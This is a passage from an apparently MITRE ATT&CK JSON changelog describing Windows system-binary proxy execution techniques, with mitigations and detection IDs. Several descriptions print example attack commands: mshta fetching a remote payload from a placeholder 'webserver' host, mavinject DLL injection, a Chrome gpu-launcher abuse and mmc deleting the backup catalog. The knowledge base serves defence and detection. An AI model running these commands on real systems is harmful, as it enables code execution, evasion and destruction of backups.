bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to <code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls</code>. Even when these registered DLLs do not comply with the CPL file specification and do not export <code>CPlApplet</code> functions, they are loaded and executed through its <code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting <code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June 2020)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/002",
                            "external_id": "T1218.002"
                        },
                        {
                            "source_name": "TrendMicro CPL Malware Dec 2013",
                            "description": "Bernardino, J. (2013, December 17). Control Panel Files Used As Malicious Attachments. Retrieved January 18, 2018.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/"
                        },
                        {
                            "source_name": "Palo Alto Reaver Nov 2017",
                            "description": "Grunzweig, J. and Miller-Osborn, J. (2017, November 10). New Malware with Ties to SunOrcal Discovered. Retrieved November 16, 2017.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
                        },
                        {
                            "source_name": "ESET InvisiMole June 2020",
                            "description": "Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE HIDDEN PART OF THE STORY. Retrieved July 16, 2020.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf"
                        },
                        {
                            "source_name": "Microsoft Implementing CPL",
                            "description": "M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.",
                            "url": "https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx"
                        },
                        {
                            "source_name": "TrendMicro CPL Malware Jan 2014",
                            "description": "Merc\u00eas, F. (2014, January 27). CPL Malware - Malicious Control Panel Items. Retrieved January 18, 2018.",
                            "url": "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "ESET"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:37:43.971000+00:00\", \"old_value\": \"2025-10-24 17:48:45.979000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1022: Restrict File and Directory Permissions",
                            "M1038: Execution Prevention"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0194: Detection of Malicious Control Panel Item Execution via control.exe or Rundll32"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-03-07 19:32:35.383000+00:00",
                    "modified": "2026-04-20 18:01:23.195000+00:00",
                    "name": "Electron Applications",
                    "description": "Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)\n\nDue to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c calc.exe`).(Citation: Electron 6-8)\n\nAdversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/015",
                            "external_id": "T1218.015"
                        },
                        {
                            "source_name": "Electron 3",
                            "description": "Alanna Titterington. (2023, September 14). Security of Electron-based desktop applications. Retrieved March 7, 2024.",
                            "url": "https://www.kaspersky.com/blog/electron-framework-security-issues/49035/"
                        },
                        {
                            "source_name": "Electron Security",
                            "description": "ElectronJS.org. (n.d.). Retrieved March 7, 2024.",
                            "url": "https://www.electronjs.org/docs/latest/tutorial/using-native-node-modules"
                        },
                        {
                            "source_name": "Electron 6-8",
                            "description": "Kosayev, U. (2023, June 15). One Electron to Rule Them All. Retrieved March 7, 2024.",
                            "url": "https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf"
                        },
                        {
                            "source_name": "Electron 1",
                            "description": "TOM ABAI. (2023, August 10). There\u2019s a New Stealer Variant in Town, and It\u2019s Using Electron to Stay Fully Undetected. Retrieved March 7, 2024.",
                            "url": "https://www.mend.io/blog/theres-a-new-stealer-variant-in-town-and-its-using-electron-to-stay-fully-undetected/"
                        },
                        {
                            "source_name": "Electron 2",
                            "description": "Trend Micro. (2023, June 6). Abusing Electronbased applications in targeted attacks. Retrieved March 7, 2024.",
                            "url": "https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLP-CLEAR-Horejsi-Abusing-Electron-Based-Applications-in-Targeted-Attacks.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Debabrata Sharma",
                        "Uriel Kosayev"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Windows"
                    ],
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 18:01:23.195000+00:00\", \"old_value\": \"2025-04-15 22:24:54.174000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.0\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['x_mitre_contributors'][1]\": \"Uriel Kosayev\"}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 2.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program",
                            "M1050: Exploit Protection"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0025: Detecting Electron Application Abuse for Proxy Execution"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--2cd950a6-16c4-404a-aa01-044322395107",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 19:09:48.811000+00:00",
                    "modified": "2026-04-15 22:39:41.457000+00:00",
                    "name": "InstallUtil",
                    "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: <code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and <code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute <code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/004",
                            "external_id": "T1218.004"
                        },
                        {
                            "source_name": "LOLBAS Installutil",
                            "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/"
                        },
                        {
                            "source_name": "MSDN InstallUtil",
                            "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.",
                            "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Casey Smith",
                        "Travis Smith, Tripwire"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:39:41.457000+00:00\", \"old_value\": \"2025-10-24 17:48:34.798000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0138: Detection of Malicious Code Execution via InstallUtil.exe"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-09-28 01:36:41.638000+00:00",
                    "modified": "2026-04-15 22:39:47.445000+00:00",
                    "name": "MMC",
                    "description": "Adversaries may abuse mmc.exe to proxy execution of malicious .msc files. Microsoft Management Console (MMC) is a binary that may be signed by Microsoft and is used in several ways in either its GUI or in a command prompt.(Citation: win_mmc)(Citation: what_is_mmc) MMC can be used to create, open, and save custom consoles that contain administrative tools created by Microsoft, called snap-ins. These snap-ins may be used to manage Windows systems locally or remotely. MMC can also be used to open Microsoft created .msc files to manage system configuration.(Citation: win_msc_files_overview)\n\nFor example, <code>mmc C:\\Users\\foo\\admintools.msc /a</code> will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is <code>mmc gpedit.msc</code>, which will open the Group Policy Editor application window. \n\nAdversaries may use MMC commands to perform malicious tasks. For example, <code>mmc wbadmin.msc delete catalog -quiet</code> deletes the backup catalog on the system (i.e. [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)) without prompts to the user (Note: <code>wbadmin.msc</code> may only be present by default on Windows Server operating systems).(Citation: win_wbadmin_delete_catalog)(Citation: phobos_virustotal)\n\nAdversaries may also abuse MMC to execute malicious .msc files. For example, adversaries may first create a malicious registry Class Identifier (CLSID) subkey, which uniquely identifies a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) class object.(Citation: win_clsid_key) Then, adversaries may create custom consoles with the \u201cLink to Web Address\u201d snap-in that is linked to the malicious CLSID subkey.(Citation: mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation: abusing_com_reg)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/014",
                            "external_id": "T1218.014"
                        },
                        {
                            "source_name": "abusing_com_reg",
                            "description": "bohops. (2018, August 18). ABUSING THE COM REGISTRY STRUCTURE (PART 2): HIJACKING & LOADING TECHNIQUES. Retrieved September 20, 2021.",
                            "url": "https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/"
                        },
                        {
                            "source_name": "mmc_vulns",
                            "description": "Boxiner, A., Vaknin, E. (2019, June 11). Microsoft Management Console (MMC) Vulnerabilities. Retrieved September 24, 2021.",
                            "url": "https://research.checkpoint.com/2019/microsoft-management-console-mmc-vulnerabilities/"
                        },
                        {
                            "source_name": "win_msc_files_overview",
                            "description": "Brinkmann, M.. (2017, June 10). Windows .msc files overview. Retrieved September 20, 2021.",
                            "url": "https://www.ghacks.net/2017/06/10/windows-msc-files-overview/"
                        },
                        {
                            "source_name": "win_mmc",
                            "description": "Microsoft. (2017, October 16). mmc. Retrieved September 20, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/mmc"
                        },
                        {
                            "source_name": "win_wbadmin_delete_catalog",
                            "description": "Microsoft. (2017, October 16). wbadmin delete catalog. Retrieved September 20, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wbadmin-delete-catalog"
                        },
                        {
                            "source_name": "win_clsid_key",
                            "description": "Microsoft. (2018, May 31). CLSID Key. Retrieved September 24, 2021.",
                            "url": "https://docs.microsoft.com/en-us/windows/win32/com/clsid-key-hklm"
                        },
                        {
                            "source_name": "what_is_mmc",
                            "description": "Microsoft. (2020, September 27). What is Microsoft Management Console?. Retrieved October 5, 2021.",
                            "url": "https://docs.microsoft.com/en-us/troubleshoot/windows-server/system-management-components/what-is-microsoft-management-console"
                        },
                        {
                            "source_name": "phobos_virustotal",
                            "description": "Phobos Ransomware. (2020, December 30). Phobos Ransomware, Fast.exe. Retrieved September 20, 2021.",
                            "url": "https://www.virustotal.com/gui/file/0b4c743246478a6a8c9fa3ff8e04f297507c2f0ea5d61a1284fe65387d172f81/detection"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Wes Hurd"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:39:47.445000+00:00\", \"old_value\": \"2025-10-24 17:49:40.236000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0222: Detecting MMC (.msc) Proxy Execution and Malicious COM Activation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1bae753e-8e52-4055-a66d-2ead90303ca9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-09-22 17:45:10.241000+00:00",
                    "modified": "2026-04-15 22:39:41.553000+00:00",
                    "name": "Mavinject",
                    "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)\n\nAdversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), allowing for arbitrary code execution (ex. <code>C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL</code>).(Citation: ATT Lazarus TTP Evolution)(Citation: Reaqta Mavinject) Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. \n\nIn addition to [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe can also be abused to perform import descriptor injection via its  <code>/HMODULE</code> command-line parameter (ex. <code>mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.(Citation: Mavinject Functionality Deconstructed)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/013",
                            "external_id": "T1218.013"
                        },
                        {
                            "source_name": "ATT Lazarus TTP Evolution",
                            "description": "Fernando Martinez. (2021, July 6). Lazarus campaign TTPs and evolution. Retrieved September 22, 2021.",
                            "url": "https://cybersecurity.att.com/blogs/labs-research/lazarus-campaign-ttps-and-evolution"
                        },
                        {
                            "source_name": "LOLBAS Mavinject",
                            "description": "LOLBAS. (n.d.). Mavinject.exe. Retrieved September 22, 2021.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Mavinject/"
                        },
                        {
                            "source_name": "Mavinject Functionality Deconstructed",
                            "description": "Matt Graeber. (2018, May 29). mavinject.exe Functionality Deconstructed. Retrieved September 22, 2021.",
                            "url": "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e"
                        },
                        {
                            "source_name": "Reaqta Mavinject",
                            "description": "Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.",
                            "url": "https://reaqta.com/2017/12/mavinject-microsoft-injector/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:39:41.553000+00:00\", \"old_value\": \"2025-10-24 17:48:28.606000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0433: Detecting Code Injection via mavinject.exe (App-V Injector)"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-23 19:32:49.557000+00:00",
                    "modified": "2026-04-15 22:40:01.325000+00:00",
                    "name": "Mshta",
                    "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))</code>\n\nThey may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/005",
                            "external_id": "T1218.005"
                        },
                        {
                            "source_name": "FireEye Attacks Leveraging HTA",
                            "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html"
                        },
                        {
                            "source_name": "FireEye FIN7 April 2017",
                            "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.",
                            "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
                        },
                        {
                            "source_name": "Airbus Security Kovter Analysis",
                            "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.",
                            "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/"
                        },
                        {
                            "source_name": "Cylance Dust Storm",
                            "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.",
                            "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"
                        },
                        {
                            "source_name": "LOLBAS Mshta",
                            "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/"
                        },
                        {
                            "source_name": "Red Canary HTA Abuse Part Deux",
                            "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.",
                            "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/"
                        },
                        {
                            "source_name": "MSDN HTML Applications",
                            "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.",
                            "url": "https://msdn.microsoft.com/library/ms536471.aspx"
                        },
                        {
                            "source_name": "Wikipedia HTML Application",
                            "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.",
                            "url": "https://en.wikipedia.org/wiki/HTML_Application"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "@ionstorm",
                        "Ricardo Dias",
                        "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-15 22:40:01.325000+00:00\", \"old_value\": \"2025-10-24 17:49:03.265000+00:00\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"stealth\", \"old_value\": \"defense-evasion\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 3.0",
                    "changelog_mitigations": {
                        "shared": [
                            "M1038: Execution Prevention",
                            "M1042: Disable or Remove Feature or Program"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0506: Detecting Mshta-based Proxy Execution via Suspicious HTA or Script Invocation"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-01-24 14:38:49.266000+00:00",
                    "modified": "2026-04-15 22:40:01.230000+00:00",
                    "name": "Msiexec",
                    "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the <code>AlwaysInstallElevated</code> policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "stealth"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1218/007",
                            "external_id": "T1218.007"
                        },
                        {
                            "source_name": "TrendMicro Msiexec Feb 2018",
                            "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.",
                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/"
                        },
                        {
                            "source_name": "LOLBAS Msiexec",
                            "description": "LOLBAS. (n.d.). Msiexec.exe. Retrieved April 18, 2019.",
                            "url": "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"
                        },
                        {
                            "source_name": "Microsoft msiexec",
                            "description": "Microsoft. (2017, October 15). msiexec. Retrieved January 24, 2020.",
                            "url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec"
                        },
                        {
                            "source_name": "Microsoft AlwaysInstallElevated 2018",
                            "description": "Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.",
